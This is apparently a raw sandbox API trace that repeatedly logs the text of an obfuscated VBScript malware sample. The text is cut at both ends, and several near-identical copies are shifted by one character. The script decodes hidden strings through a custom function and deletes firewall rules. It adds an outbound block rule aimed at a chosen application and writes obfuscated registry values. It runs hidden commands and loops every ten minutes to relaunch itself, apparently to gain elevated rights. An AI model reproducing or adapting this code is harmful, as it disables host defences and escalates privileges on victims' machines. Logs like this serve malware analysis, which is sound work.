rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0222.995] wcsncmp (_String1="im rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.995] wcsncmp (_String1="m rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0222.995] wcsncmp (_String1=" rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.995] wcsncmp (_String1="rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run 